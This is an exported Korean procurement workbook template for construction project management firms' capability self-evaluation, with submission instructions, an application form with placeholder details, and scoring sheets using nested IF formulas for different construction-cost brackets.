Workbook

Sheet 제출방법
A1: (건설사업관리용역업자 사업수행능력평가서 제출요령)
A3: 1. 각 시트의 출력물 1부씩을 다음의 순서대로 좌철(1권),합본하여 제출하여야 합니다.
A4: * G2B(나라장터)에서 등록한후 출력한 경쟁입찰참가자격등록증(사본)을 출력하여 첨부할것[공동도급(공동이행,분담이행 )] 사의 경쟁입찰참가자격등록증 사본도 동시 합본 제출
A5: 1) 사업수행능력평가신청서
A6: 2) 자기평가기술서
A7: 3) 공동수급협정체결현황
A8: ※4) 참여기술자 자격사항
A9: ※5) 참여기술자 경력사항
A10: ※6) 유사용역수행실적
A11: 7) 입찰참가제한 및 업무정지(등록시 관련 내용을 누락할 수 있어서 추가확인필요)
A12: 8) 부실벌점
A13: ※9) 재정상태,투자실적
... A28: 5. 위의 제출방법에 따라 각 시트(18항목)를 출력, 관련 증빙서류를 합철(1권)하여 제출하시기 바랍니다.

Sheet 1.사업수행능력평가신청서
A2: 접수번호
A4: 건설사업관리용역업자 사업수행능력 평가서(용역참여 신청서)
A6: 수 신 : 조달청장
A7: 참 조 : 기술서비스국 건설기술계약과
A8: 제 목 : 건설사업관리용역업자 사업수행능력평가서 제출 | K8: 접 수 인
A9: 아래 용역에 대한 "건설사업관리용역업자 수행능력평가서"를 붙임과 같이 제출합니다.
A11: ======= 아 래 =======
A12: 관 리 번 호 : | B12: R26DC00000000 - 00
A13: 용 역 명 : | B13: 0000 공사 건설사업관리용역
A14: 수 요 기 관 : | B14: 000000000000기관
A15: 입찰공고일 : | D15: 평가서마감 일시 :
A16: 사업자등록번호 : | B16: 111-12-34567 | D16: 입 찰 일 시 :
A18: 붙 임 : | B18: 사업수행능력평가서 1부
A19: 업 체 명 : | B19: (주)000
A20: 대 표 자 : | B20: 김조달 | C20: (인) | E20: 주 소 :
A21: 전 화 번 호 : | B21: 042) 0000-0000 | E21: FAX 번 호 : | G21: 042) 0000-0001
A22: 평가서 작성자 : | B22: ㅇㅇㅇ | E22: 구내전화 : | F22: 042) 0000-0000
A23: (HP : 010-0000-0000)

Sheet 2.자기평가기술서(1000억원이상)
A1: 2. 자기평가기술서(공사비 1,000억원 이상)
A3: 1. 관리번호 | D3: ='1.사업수행능력평가신청서'!B12 -> R26DC00000000 - 00 | Q3: 4. 회 사 명 | T3: ='1.사업수행능력평가신청서'!B19 -> (주)000 | Y3: ='1.사업수행능력평가신청서'!B20 -> 김조달
A4: 2. 수요기관 | D4: ='1.사업수행능력평가신청서'!B14 -> 000000000000기관 | Q4: 5. 평가작성자 | T4: ='1.사업수행능력평가신청서'!B22 -> ㅇㅇㅇ | V4: ='1.사업수행능력평가신청서'!E22 -> 구내전화 : | W4: ='1.사업수행능력평가신청서'!F22 -> 042) 0000-0000
A5: 3. 용 역 명 | D5: ='1.사업수행능력평가신청서'!B13 -> 0000 공사 건설사업관리용역 | Q5: 6. 사업자등록번호 | T5: ='1.사업수행능력평가신청서'!B16 -> 111-12-34567
A6: 7. 연 락 처 | D6: 전화 | F6: ='1.사업수행능력평가신청서'!A23 -> (HP : 010-0000-0000) | L6: 팩스 | N6: ='1.사업수행능력평가신청서'!G21 -> 042) 0000-0001
A7: 구 분 | C7: 참여 기술자 | M7: 용 역 수행실적 (10) | O7: 신용도 (15) | R7: 기술개발 투자실적 (10) | T7: 교체 빈도 (5) | V7: 계 (100) | W7: 가감점 | Z7: 총 점
C8: 성 명 | D8: 분 야 | E8: 등 급 | F8: 해당분야 | H8: 직무분야 | J8: 교육훈련 및 기술자격 | K8: 면접 (발표) | L8: 계 (60)
F9: 설계,시공,시험 검사,사업관리, 유지관리,감독,감리 | M9: 금액 (억원) | N9: 점 수 | O9: 입찰참가제한 등 (7) | P9: 부실벌점 (5) | Q9: 재정 상태 (3) | R9: 개발활용실적 (3) | S9: 투자실적 (7) | T9: 건설사업관리용역업자 (3) | U9: 참여기술자 (2) | W9: 건설 기술인 신규 고용률 | X9: 공사비절감기여 | Y9: 부 패 행 위
F10: 년월 | G10: 점수 | H10: 년수 | I10: 점수 | J10: 점수 | K10: 점수
A11: (평가대상자) | L11: =L12+((L13+L14+L15)/3)+L16 -> 56.4 | M11: ='6. 유사용역수행실적'!L38/100 -> 126.36 | N11: =IF(M11>=250,10,IF(M11>=210,9,IF(M11>=170,8,IF(M11>=130,7,IF(M11>=90,6,0))))) -> 6 | O11: 7 | P11: 5 | Q11: 3 | R11: ='10. 건설기술개발활용실적'!E10 -> 3 | S11: ='9. 재정상태,투자실적'!E16 -> 7 | T11: ='12. 교체빈도'!H9 -> 3 | U11: ='12. 교체빈도'!H21 -> 2 | V11: =L11+N11+O11+P11+Q11+R11+S11+T11+U11 -> 92.4 | W11: ='13.건설기술인 신규고용률'!Q5 -> 0.4 | X11: 1 | Y11: 1 | Z11: =SUM(V11:X11)-Y11 -> 92.8
A12: 상주 | B12: 책임 | C12: ='5. 참여기술자 경력사항'!C6 -> 홍길동 | D12: ='5. 참여기술자 경력사항'!D6 -> 건축 | F12: ='5. 참여기술자 경력사항'!I6 -> 18.082192 | G12: =IF(F12>=15,15,IF(F12>=13,13.5,IF(F12>=11,12,IF(F12>=9,10.5,9)))) -> 15 | H12: ='5. 참여기술자 경력사항'!G6 -> 5.7534247 | I12: =IF(E12="특급",IF(H12>=15,9,IF(H12>=13,8.1,IF(H12>=11,7.2,IF(H12>=9,6.3,5.4)))),IF(H12>=12,9,IF(H12>=10,8.1,IF(H12>=8,7.2,IF(H12>=6,6.3,5.4))))) -> 5.4 | J12: 1 | K12: 0 | L12: =G12+I12+J12+K12 -> 21.4
B13: 보조 | C13: ='5. 참여기술자 경력사항'!C7 -> 안중근 | D13: ='5. 참여기술자 경력사항'!D7 -> 건축 | F13: ='5. 참여기술자 경력사항'!I7 -> 200 | G13: =IF(F13>=48,15,IF(F13>=42,13.5,IF(F13>=36,12,IF(F13>=30,10.5,9)))) -> 15 | H13: ='5. 참여기술자 경력사항'!G7 -> 16.438356 | I13: =IF(E13="특급",IF(H13>=10,9,IF(H13>=8,8.1,IF(H13>=6,7.2,IF(H13>=4,6.3,5.4)))),IF(E13="고급",(IF(H13>=8,9,IF(H13>=6,8.1,IF(H13>=4,7.2,IF(H13>=2,6.3,5.4))))),(IF(H13>=6,9,IF(H13>=4,8.1,IF(H13>=2,7.2,6.3)))))) -> 9 | J13: 1 | K13: 0 | L13: =G13+I13+J13+K13 -> 25
B14: 보조 | C14: ='5. 참여기술자 경력사항'!C8 -> 김 구 | D14: ='5. 참여기술자 경력사항'!D8 -> 토목 | F14: ='5. 참여기술자 경력사항'!I8 -> 200 | G14: =IF(F14>=48,15,IF(F14>=42,13.5,IF(F14>=36,12,IF(F14>=30,10.5,9)))) -> 15 | H14: ='5. 참여기술자 경력사항'!G8 -> 16.438356 | I14: =IF(E14="특급",IF(H14>=10,9,IF(H14>=8,8.1,IF(H14>=6,7.2,IF(H14>=4,6.3,5.4)))),IF(E14="고급",(IF(H14>=8,9,IF(H14>=6,8.1,IF(H14>=4,7.2,IF(H14>=2,6.3,5.4))))),(IF(H14>=6,9,IF(H14>=4,8.1,IF(H14>=2,7.2,6.3)))))) -> 9 | J14: 1 | K14: 0 | L14: =G14+I14+J14+K14 -> 25
B15: 보조 | C15: ='5. 참여기술자 경력사항'!C9 -> 윤봉길 | D15: ='5. 참여기술자 경력사항'!D9 -> 기계 | F15: ='5. 참여기술자 경력사항'!I9 -> 200 | G15: =IF(F15>=48,15,IF(F15>=42,13.5,IF(F15>=36,12,IF(F15>=30,10.5,9)))) -> 15 | H15: ='5. 참여기술자 경력사항'!G9 -> 16.438356 | I15: =IF(E15="특급",IF(H15>=10,9,IF(H15>=8,8.1,IF(H15>=6,7.2,IF(H15>=4,6.3,5.4)))),IF(E15="고급",(IF(H15>=8,9,IF(H15>=6,8.1,IF(H15>=4,7.2,IF(H15>=2,6.3,5.4))))),(IF(H15>=6,9,IF(H15>=4,8.1,IF(H15>=2,7.2,6.3)))))) -> 9 | J15: 1 | K15: 0 | L15: =G15+I15+J15+K15 -> 25
A16: 비상주 | B16: 보조 | C16: ='5. 참여기술자 경력사항'!C10 -> 허 준 | D16: ='5. 참여기술자 경력사항'!D10 -> 건축 | F16: ='5. 참여기술자 경력사항'!I10 -> 16.438356 | G16: =IF(F16>=15,6,IF(F16>=13,5.4,IF(F16>=11,4.8,IF(F16>=9,4.2,3.6)))) -> 6 | H16: ='5. 참여기술자 경력사항'!$G$10 -> 16.438356 | I16: =IF(H16>=15,3,IF(H16>=13,2.4,IF(H16>=11,1.8,IF(H16>=9,1.2,0.6)))) -> 3 | J16: 1 | K16: 0 | L16: =G16+I16+J16+K16 -> 10

Sheet 2.자기평가기술서(500억원이상-1000억원미만))
A1: 2. 자기평가기술서(공사비 500억원 이상~1,000억원 미만)
A3: 1. 관리번호 | D3: ='1.사업수행능력평가신청서'!B12 -> R26DC00000000 - 00 | Q3: 4. 회 사 명 | T3: ='1.사업수행능력평가신청서'!B19 -> (주)000 | Y3: ='1.사업수행능력평가신청서'!B20 -> 김조달
A4: 2. 수요기관 | D4: ='1.사업수행능력평가신청서'!B14 -> 000000000000기관 | Q4: 5. 평가작성자 | T4: ='1.사업수행능력평가신청서'!B22 -> ㅇㅇㅇ | V4: ='1.사업수행능력평가신청서'!E22 -> 구내전화 : | W4: ='1.사업수행능력평가신청서'!F22 -> 042) 0000-0000
A5: 3. 용 역 명 | D5: ='1.사업수행능력평가신청서'!B13 -> 0000 공사 건설사업관리용역 | Q5: 6. 사업자등록번호 | T5: ='1.사업수행능력평가신청서'!B16 -> 111-12-34567
A6: 7. 연 락 처 | D6: 전화 | F6: ='1.사업수행능력평가신청서'!A23 -> (HP : 010-0000-0000) | L6: 팩스 | N6: ='1.사업수행능력평가신청서'!G21 -> 042) 0000-0001
A7: 구 분 | C7: 참여 기술자 | M7: 용 역 수행실적 (10) | O7: 신용도 (15) | R7: 기술개발 투자실적 (10) | T7: 교체 빈도 (5) | V7: 계 (100) | W7: 가감점 | Z7: 총 점
C8: 성 명 | D8: 분 야 | E8: 등 급 | F8: 해당분야 | H8: 직무분야 | J8: 교육훈련 및 기술자격 | K8: 면접 (발표) | L8: 계 (60)
F9: 설계,시공,시험 검사,사업관리, 유지관리,감독,감리 | M9: 금액 (억원) | N9: 점 수 | O9: 입찰참가제한 등 (7) | P9: 부실벌점 (5) | Q9: 재정 상태 (3) | R9: 개발활용실적 (3) | S9: 투자실적 (7) | T9: 건설사업관리용역업자 (3) | U9: 참여기술자 (2) | W9: 건설 기술인 신규 고용률 | X9: 공사비절감기여 | Y9: 부 패 행 위
F10: 년월 | G10: 점수 | H10: 년수 | I10: 점수 | J10: 점수 | K10: 점수
A11: (평가대상자) | L11: =L12+((L13+L14+L15)/3)+L16 -> 56.4 | M11: ='6. 유사용역수행실적'!L38/100 -> 126.36 | N11: =IF(M11>=190,10,IF(M11>=160,9,IF(M11>=130,8,IF(M11>=100,7,IF(M11>=70,6,0))))) -> 7 | O11: 7 | P11: 5 | Q11: 3 | R11: ='10. 건설기술개발활용실적'!E10 -> 3 | S11: ='9. 재정상태,투자실적'!E16 -> 7 | T11: ='12. 교체빈도'!H9 -> 3 | U11: ='12. 교체빈도'!H21 -> 2 | V11: =L11+N11+O11+P11+Q11+R11+S11+T11+U11 -> 93.4 | W11: ='13.건설기술인 신규고용률'!Q5 -> 0.4 | Z11: =SUM(V11:X11)-Y11 -> 93.8
A12: 상주 | B12: 책임 | C12: ='5. 참여기술자 경력사항'!C6 -> 홍길동 | D12: ='5. 참여기술자 경력사항'!D6 -> 건축 | F12: ='5. 참여기술자 경력사항'!I6 -> 18.082192 | G12: =IF(F12>=13,15,IF(F12>=11,13.5,IF(F12>=9,12,IF(F12>=7,10.5,9)))) -> 15 | H12: ='5. 참여기술자 경력사항'!G6 -> 5.7534247 | I12: =IF(E12="특급",IF(H12>=15,9,IF(H12>=13,8.1,IF(H12>=11,7.2,IF(H12>=9,6.3,5.4)))),IF(H12>=12,9,IF(H12>=10,8.1,IF(H12>=8,7.2,IF(H12>=6,6.3,5.4))))) -> 5.4 | J12: 1 | K12: 0 | L12: =G12+I12+J12+K12 -> 21.4
B13: 보조 | C13: ='5. 참여기술자 경력사항'!C7 -> 안중근 | D13: ='5. 참여기술자 경력사항'!D7 -> 건축 | F13: ='5. 참여기술자 경력사항'!I7 -> 200 | G13: =IF(F13>=48,15,IF(F13>=42,13.5,IF(F13>=36,12,IF(F13>=30,10.5,9)))) -> 15 | H13: ='5. 참여기술자 경력사항'!G7 -> 16.438356 | I13: =IF(E13="특급",IF(H13>=10,9,IF(H13>=8,8.1,IF(H13>=6,7.2,IF(H13>=4,6.3,5.4)))),IF(E13="고급",(IF(H13>=8,9,IF(H13>=6,8.1,IF(H13>=4,7.2,IF(H13>=2,6.3,5.4))))),(IF(H13>=6,9,IF(H13>=4,8.1,IF(H13>=2,7.2,6.3)))))) -> 9 | J13: 1 | K13: 0 | L13: =G13+I13+J13+K13 -> 25
B14: 보조 | C14: ='5. 참여기술자 경력사항'!C8 -> 김 구 | D14: ='5. 참여기술자 경력사항'!D8 -> 토목 | F14: ='5. 참여기술자 경력사항'!I8 -> 200 | G14: =IF(F14>=48,15,IF(F14>=42,13.5,IF(F14>=36,12,IF(F14>=30,10.5,9)))) -> 15 | H14: ='5. 참여기술자 경력사항'!G8 -> 16.438356 | I14: =IF(E14="특급",IF(H14>=10,9,IF(H14>=8,8.1,IF(H14>=6,7.2,IF(H14>=4,6.3,5.4)))),IF(E14="고급",(IF(H14>=8,9,IF(H14>=6,8.1,IF(H14>=4,7.2,IF(H14>=2,6.3,5.4))))),(IF(H14>=6,9,IF(H14>=4,8.1,IF(H14>=2,7.2,6.3)))))) -> 9 | J14: 1 | K14: 0 | L14: =G14+I14+J14+K14 -> 25
B15: 보조 | C15: ='5. 참여기술자 경력사항'!C9 -> 윤봉길 | D15: ='5. 참여기술자 경력사항'!D9 -> 기계 | F15: ='5. 참여기술자 경력사항'!I9 -> 200 | G15: =IF(F15>=48,15,IF(F15>=42,13.5,IF(F15>=36,12,IF(F15>=30,10.5,9)))) -> 15 | H15: ='5. 참여기술자 경력사항'!G9 -> 16.438356 | I15: =IF(E15="특급",IF(H15>=10,9,IF(H15>=8,8.1,IF(H15>=6,7.2,IF(H15>=4,6.3,5.4)))),IF(E15="고급",(IF(H15>=8,9,IF(H15>=6,8.1,IF(H15>=4,7.2,IF(H15>=2,6.3,5.4))))),(IF(H15>=6,9,IF(H15>=4,8.1,IF(H15>=2,7.2,6.3)))))) -> 9 | J15: 1 | K15: 0 | L15: =G15+I15+J15+K15 -> 25
A16: 비상주 | B16: 보조 | C16: ='5. 참여기술자 경력사항'!C10 -> 허 준 | D16: ='5. 참여기술자 경력사항'!D10 -> 건축 | F16: ='5. 참여기술자 경력사항'!I10 -> 16.438356 | G16: =IF(F16>=13,6,IF(F16>=11,5.4,IF(F16>=9,4.8,IF(F16>=7,4.2,3.6)))) -> 6 | H16: ='5. 참여기술자 경력사항'!$G$10 -> 16.438356 | I16: =IF(H16>=15,3,IF(H16>=13,2.4,IF(H16>=11,1.8,IF(H16>=9,1.2,0.6)))) -> 3 | J16: 1 | L16: =G16+I16+J16+K16 -> 10

Sheet 2.자기평가기술서(300억원미만-100억원이상)
A1: 2. 자기평가기술서(공사비 100억원 이상 ~ 300억원 미만)
A3: 1. 관리번호 | D3: ='1.사업수행능력평가신청서'!B12 -> R26DC00000000 - 00 | Q3: 4. 회 사 명 | T3: ='1.사업수행능력평가신청서'!B19 -> (주)000 | Y3: ='1.사업수행능력평가신청서'!B20 -> 김조달
A4: 2. 수요기관 | D4: ='1.사업수행능력평가신청서'!B14 -> 000000000000기관 | Q4: 5. 평가작성자 | T4: ='1.사업수행능력평가신청서'!B22 -> ㅇㅇㅇ | V4: ='1.사업수행능력평가신청서'!E22 -> 구내전화 : | W4: ='1.사업수행능력평가신청서'!F22 -> 042) 0000-0000
A5: 3. 용 역 명 | D5: ='1.사업수행능력평가신청서'!B13 -> 0000 공사 건설사업관리용역 | Q5: 6. 사업자등록번호 | T5: ='1.사업수행능력평가신청서'!B16 -> 111-12-34567
A6: 7. 연 락 처 | D6: 전화 | F6: ='1.사업수행능력평가신청서'!A23 -> (HP : 010-0000-0000) | L6: 팩스 | N6: ='1.사업수행능력평가신청서'!G21 -> 042) 0000-0001
A7: 구 분 | C7: 참여 기술자 | M7: 용 역 수행실적 (10) | O7: 신용도 (15) | R7: 기술개발 투자실적 (10) | T7: 교체 빈도 (5) | V7: 계 (100) | W7: 가감점 | Z7: 총 점
C8: 성 명 | D8: 분 야 | E8: 등 급 | F8: 해당분야 | H8: 직무분야 | J8: 교육훈련 및 기술자격 | K8: 면접 (발표) | L8: 계 (60)
F9: 설계,시공,시험 검사,사업관리, 유지관리,감독,감리 | M9: 금액 (억원) | N9: 점 수 | O9: 입찰참가제한 등 (7) | P9: 부실벌점 (5) | Q9: 재정 상태 (3) | R9: 개발활용실적 (3) | S9: 투자실적 (7) | T9: 건설사업관리용역업자 (3) | U9: 참여기술자 (2) | W9: 건설 기술인 신규 고용률 | X9: 공사비절감기여 | Y9: 부 패 행 위
F10: 년월 | G10: 점수 | H10: 년수 | I10: 점수 | J10: 점수 | K10: 점수
A11: (평가대상자) | L11: =L12+((L13+L14+L15)/3)+L16 -> 56.4 | M11: ='6. 유사용역수행실적'!L38/100 -> 126.36 | N11: =IF(M11>=80,10,IF(M11>=65,9,IF(M11>=50,8,IF(M11>=35,7,IF(M11>=20,6,0))))) -> 10 | O11: 7 | P11: 5 | Q11: 3 | R11: ='10. 건설기술개발활용실적'!E10 -> 3 | S11: ='9. 재정상태,투자실적'!E16 -> 7 | T11: ='12. 교체빈도'!H9 -> 3 | U11: ='12. 교체빈도'!H21 -> 2 | V11: =L11+N11+O11+P11+Q11+R11+S11+T11+U11 -> 96.4 | W11: ='13.건설기술인 신규고용률'!Q5 -> 0.4 | Z11: =SUM(V11:X11)-Y11 -> 96.8
A12: 상주 | B12: 책임 | C12: ='5. 참여기술자 경력사항'!C6 -> 홍길동 | D12: ='5. 참여기술자 경력사항'!D6 -> 건축 | F12: ='5. 참여기술자 경력사항'!I6 -> 18.082192 | G12: =IF(F12>=9,15,IF(F12>=7,13.5,IF(F12>=5,12,IF(F12>=3,10.5,9)))) -> 15 | H12: ='5. 참여기술자 경력사항'!G6 -> 5.7534247 | I12: =IF(E12="특급",IF(H12>=15,9,IF(H12>=13,8.1,IF(H12>=11,7.2,IF(H12>=9,6.3,5.4)))),IF(H12>=12,9,IF(H12>=10,8.1,IF(H12>=8,7.2,IF(H12>=6,6.3,5.4))))) -> 5.4 | J12: 1 | K12: 0 | L12: =G12+I12+J12+K12 -> 21.4
B13: 보조 | C13: ='5. 참여기술자 경력사항'!C7 -> 안중근 | D13: ='5. 참여기술자 경력사항'!D7 -> 건축 | F13: ='5. 참여기술자 경력사항'!I7 -> 200 | G13: =IF(F13>=36,15,IF(F13>=28,13.5,IF(F13>=20,12,IF(F13>=12,10.5,9)))) -> 15 | H13: ='5. 참여기술자 경력사항'!G7 -> 16.438356 | I13: =IF(E13="특급",IF(H13>=10,9,IF(H13>=8,8.1,IF(H13>=6,7.2,IF(H13>=4,6.3,5.4)))),IF(E13="고급",(IF(H13>=8,9,IF(H13>=6,8.1,IF(H13>=4,7.2,IF(H13>=2,6.3,5.4))))),(IF(H13>=6,9,IF(H13>=4,8.1,IF(H13>=2,7.2,6.3)))))) -> 9 | J13: 1 | K13: 0 | L13: =G13+I13+J13+K13 -> 25
B14: 보조 | C14: ='5. 참여기술자 경력사항'!C8 -> 김 구 | D14: ='5. 참여기술자 경력사항'!D8 -> 토목 | F14: ='5. 참여기술자 경력사항'!I8 -> 200 | G14: =IF(F14>=36,15,IF(F14>=28,13.5,IF(F14>=20,12,IF(F14>=12,10.5,9)))) -> 15 | H14: ='5. 참여기술자 경력사항'!G8 -> 16.438356 | I14: =IF(E14="특급",IF(H14>=10,9,IF(H14>=8,8.1,IF(H14>=6,7.2,IF(H14>=4,6.3,5.4)))),IF(E14="고급",(IF(H14>=8,9,IF(H14>=6,8.1,IF(H14>=4,7.2,IF(H14>=2,6.3,5.4))))),(IF(H14>=6,9,IF(H14>=4,8.1,IF(H14>=2,7.2,6.3)))))) -> 9 | J14: 1 | K14: 0 | L14: =G14+I14+J14+K14 -> 25
B15: 보조 | C15: ='5. 참여기술자 경력사항'!C9 -> 윤봉길 | D15: ='5. 참여기술자 경력사항'!D9 -> 기계 | F15: ='5. 참여기술자 경력사항'!I9 -> 200 | G15: =IF(F15>=36,15,IF(F15>=28,13.5,IF(F15>=20,12,IF(F15>=12,10.5,9)))) -> 15 | H15: ='5. 참여기술자 경력사항'!G9 -> 16.438356 | I15: =IF(E15="특급",IF(H15>=10,9,IF(H15>=8,8.1,IF(H15>=6,7.2,IF(H15>=4,6.3,5.4)))),IF(E15="고급",(IF(H15>=8,9,IF(H15>=6,8.1,IF(H15>=4,7.2,IF(H15>=2,6.3,5.4))))),(IF(H15>=6,9,IF(H15>=4,8.1,IF(H15>=2,7.2,6.3)))))) -> 9 | J15: 1 | K15: 0 | L15: =G15+I15+J15+K15 -> 25
A16: 비상주 | B16: 보조 | C16: ='5. 참여기술자 경력사항'!C10 -> 허 준 | D16: ='5. 참여기술자 경력사항'!D10 -> 건축 | F16: ='5. 참여기술자 경력사항'!I10 -> 16.438356 | G16: =IF(F16>=9,6,IF(F16>=7,5.4,IF(F16>=5,4.8,IF(F16>=3,4.2,3.6)))) -> 6 | H16: ='5. 참여기술자 경력사항'!$G$10 -> 16.438356 | I16: =IF(H16>=15,3,IF(H16>=13,2.4,IF(H16>=11,1.8,IF(H16>=9,1.2,0.6)))) -> 3 | J16: 1 | L16: =G16+I16+J16+K16 -> 10

Sheet 2.자기평가기술서(300억원이상-500억원미만)
A1: 2. 자기평가기술서(공사비 300억원 이상 ~ 500억원 미만)
A3: 1. 관리번호 | D3: ='1.사업수행능력평가신청서'!B12 -> R26DC00000000 - 00 | Q3: 4. 회 사 명 | T3: ='1.사업수행능력평가신청서'!B19 -> (주)000 | Y3: ='1.사업수행능력평가신청서'!B20 -> 김조달
A4: 2. 수요기관 | D4: ='1.사업수행능력평가신청서'!B14 -> 000000000000기관 | Q4: 5. 평가작성자 | T4: ='1.사업수행능력평가신청서'!B22 -> ㅇㅇㅇ | V4: ='1.사업수행능력평가신청서'!E22 -> 구내전화 : | W4: ='1.사업수행능력평가신청서'!F22 -> 042) 0000-0000
A5: 3. 용 역 명 | D5: ='1.사업수행능력평가신청서'!B13 -> 0000 공사 건설사업관리용역 | Q5: 6. 사업자등록번호 | T5: ='1.사업수행능력평가신청서'!B16 -> 111-12-34567
A6: 7. 연 락 처 | D6: 전화 | F6: ='1.사업수행능력평가신청서'!A23 -> (HP : 010-0000-0000) | L6: 팩스 | N6: ='1.사업수행능력평가신청서'!G21 -> 042) 0000-0001
A7: 구 분 | C7: 참여 기술자 | M7: 용 역 수행실적 (10) | O7: 신용도 (15) | R7: 기술개발 투자실적 (10) | T7: 교체 빈도 (5) | V7: 계 (100) | W7: 가감점 | Z7: 총 점
C8: 성 명 | D8: 분 야 | E8: 등 급 | F8: 해당분야 | H8: 직무분야 | J8: 교육훈련 및 기술자격 | K8: 면접 (발표) | L8: 계 (60)
F9: 설계,시공,시험 검사,사업관리, 유지관리,감독,감리 | M9: 금액 (억원) | N9: 점 수 | O9: 입찰참가제한 등 (7) | P9: 부실벌점 (5) | Q9: 재정 상태 (3) | R9: 개발활용실적 (3) | S9: 투자실적 (7) | T9: 건설사업관리용역업자 (3) | U9: 참여기술자 (2) | W9: 건설 기술인 신규 고용률 | X9: 공사비절감기여 | Y9: 부 패 행 위
F10: 년월 | G10: 점수 | H10: 년수 | I10: 점수 | J10: 점수 | K10: 점수
A11: (평가대상자) | L11: =L12+((L13+L14+L15)/3)+L16 -> 56.4 | M11: ='6. 유사용역수행실적'!L38/100 -> 126.36 | N11: =IF(M11>=130,10,IF(M11>=110,9,IF(M11>=90,8,IF(M11>=70,7,IF(M11>=50,6,0))))) -> 9 | O11: 7 | P11: 5 | Q11: 3 | R11: ='10. 건설기술개발활용실적'!E10 -> 3 | S11: ='9. 재정상태,투자실적'!E16 -> 7 | T11: ='12. 교체빈도'!H9 -> 3 | U11: ='12. 교체빈도'!H21 -> 2 | V11: =L11+N11+O11+P11+Q11+R11+S11+T11+U11 -> 95.4 | W11: ='13.건설기술인 신규고용률'!Q5 -> 0.4 | Z11: =SUM(V11:X11)-Y11 -> 95.8
A12: 상주 | B12: 책임 | C12: ='5. 참여기술자 경력사항'!C6 -> 홍길동 | D12: ='5. 참여기술자 경력사항'!D6 -> 건축 | F12: ='5. 참여기술자 경력사항'!I6 -> 18.082192 | G12: =IF(F12>=11,15,IF(F12>=9,13.5,IF(F12>=7,12,IF(F12>=5,10.5,9)))) -> 15 | H12: ='5. 참여기술자 경력사항'!G6 -> 5.7534247 | I12: =IF(E12="특급",IF(H12>=15,9,IF(H12>=13,8.1,IF(H12>=11,7.2,IF(H12>=9,6.3,5.4)))),IF(H12>=12,9,IF(H12>=10,8.1,IF(H12>=8,7.2,IF(H12>=6,6.3,5.4))))) -> 5.4 | J12: 1 | K12: 0 | L12: =G12+I12+J12+K12 -> 21.4
B13: 보조 | C13: ='5. 참여기술자 경력사항'!C7 -> 안중근 | D13: ='5. 참여기술자 경력사항'!D7 -> 건축 | F13: ='5. 참여기술자 경력사항'!I7 -> 200 | G13: =IF(F13>=48,15,IF(F13>=42,13.5,IF(F13>=36,12,IF(F13>=30,10.5,9)))) -> 15 | H13: ='5. 참여기술자 경력사항'!G7 -> 16.438356 | I13: =IF(E13="특급",IF(H13>=10,9,IF(H13>=8,8.1,IF(H13>=6,7.2,IF(H13>=4,6.3,5.4)))),IF(E13="고급",(IF(H13>=8,9,IF(H13>=6,8.1,IF(H13>=4,7.2,IF(H13>=2,6.3,5.4))))),(IF(H13>=6,9,IF(H13>=4,8.1,IF(H13>=2,7.2,6.3)))))) -> 9 | J13: 1 | K13: 0 | L13: =G13+I13+J13+K13 -> 25
B14: 보조 | C14: ='5. 참여기술자 경력사항'!C8 -> 김 구 | D14: ='5. 참여기술자 경력사항'!D8 -> 토목 | F14: ='5. 참여기술자 경력사항'!I8 -> 200 | G14: =IF(F14>=48,15,IF(F14>=42,13.5,IF(F14>=36,12,IF(F14>=30,10.5,9)))) -> 15 | H14: ='5. 참여기술자 경력사항'!G8 -> 16.438356 | I14: =IF(E14="특급",IF(H14>=10,9,IF(H14>=8,8.1,IF(H14>=6,7.2,IF(H14>=4,6.3,5.4)))),IF(E14="고급",(IF(H14>=8,9,IF(H14>=6,8.1,IF(H14>=4,7.2,IF(H14>=2,6.3,5.4))))),(IF(H14>=6,9,IF(H14>=4,8.1,IF(H14>=2,7.2,6.3)))))) -> 9 | J14: 1 | K14: 0 | L14: =G14+I14+J14+K14 -> 25
B15: 보조 | C15: ='5. 참여기술자 경력사항'!C9 -> 윤봉길 | D15: ='5. 참여기술자 경력사항'!D9 -> 기계 | F15: ='5. 참여기술자 경력사항'!I9 -> 200 | G15: =IF(F15>=48,15,IF(F15>=42,13.5,IF(F15>=36,12,IF(F15>=30,10.5,9)))) -> 15 | H15: ='5. 참여기술자 경력사항'!G9 -> 16.438356 | I15: =IF(E15="특급",IF(H15>=10,9,IF(H15>=8,8.1,IF(H15>=6,7.2,IF(H15>=4,6.3,5.4)))),IF(E15="고급",(IF(H15>=8,9,IF(H15>=6,8.1,IF(H15>=4,7.2,IF(H15>=2,6.3,5.4))))),(IF(H15>=6,9,IF(H15>=4,8.1,IF(H15>=2,7.2,6.3)))))) -> 9 | J15: 1 | K15: 0 | L15: =G15+I15+J15+K15 -> 25
A16: 비상주 | B16: 보조 | C16: ='5. 참여기술자 경력사항'!C10 -> 허 준 | D16: ='5. 참여기술자 경력사항'!D10 -> 건축 | F16: ='5. 참여기술자 경력사항'!I10 -> 16.438356 | G16: =IF(F16>=11,6,IF(F16>=9,5.4,IF(F16>=7,4.8,IF(F16>=5,4.2,3.6)))) -> 6 | H16: ='5. 참여기술자 경력사항'!$G$10 -> 16.438356 | I16: =IF(H16>=15,3,IF(H16>=13,2.4,IF(H16>=11,1.8,IF(H16>=9,1.2,0.6)))) -> 3 | J16: 1 | L16: =G16+I16+J16+K16 -> 10

Sheet 2.자기평가기술서(100억원미만)
A1: 2. 자기평가기술서(공사비 100억원 미만)
A3: 1. 관리번호 | D3: ='1.사업수행능력평가신청서'!B12 -> R26DC00000000 - 00 | Q3: 4. 회 사 명 | T3: ='1.사업수행능력평가신청서'!B19 -> (주)000 | Y3: ='1.사업수행능력평가신청서'!B20 -> 김조달
A4: 2. 수요기관 | D4: ='1.사업수행능력평가신청서'!B14 -> 000000000000기관 | Q4: 5. 평가작성자 | T4: ='1.사업수행능력평가신청서'!B22 -> ㅇㅇㅇ | V4: ='1.사업수행능력평가신청서'!E22 -> 구내전화 : | W4: ='1.사업수행능력평가신청서'!F22 -> 042) 0000-0000
A5: 3. 용 역 명 | D5: ='1.사업수행능력평가신청서'!B13 -> 0000 공사 건설사업관리용역 | Q5: 6. 사업자등록번호 | T5: ='1.사업수행능력평가신청서'!B16 -> 111-12-34567
A6: 7. 연 락 처 | D6: 전화 | F6: ='1.사업수행능력평가신청서'!A23 -> (HP : 010-0000-0000) | L6: 팩스 | N6: ='1.사업수행능력평가신청서'!G21 -> 042) 0000-0001
A7: 구 분 | C7: 참여 기술자 | M7: 용 역 수행실적 (10) | O7: 신용도 (15) | R7: 기술개발 투자실적 (10) | T7: 교체 빈도 (5) | V7: 계 (100) | W7: 가감점 | Z7: 총 점
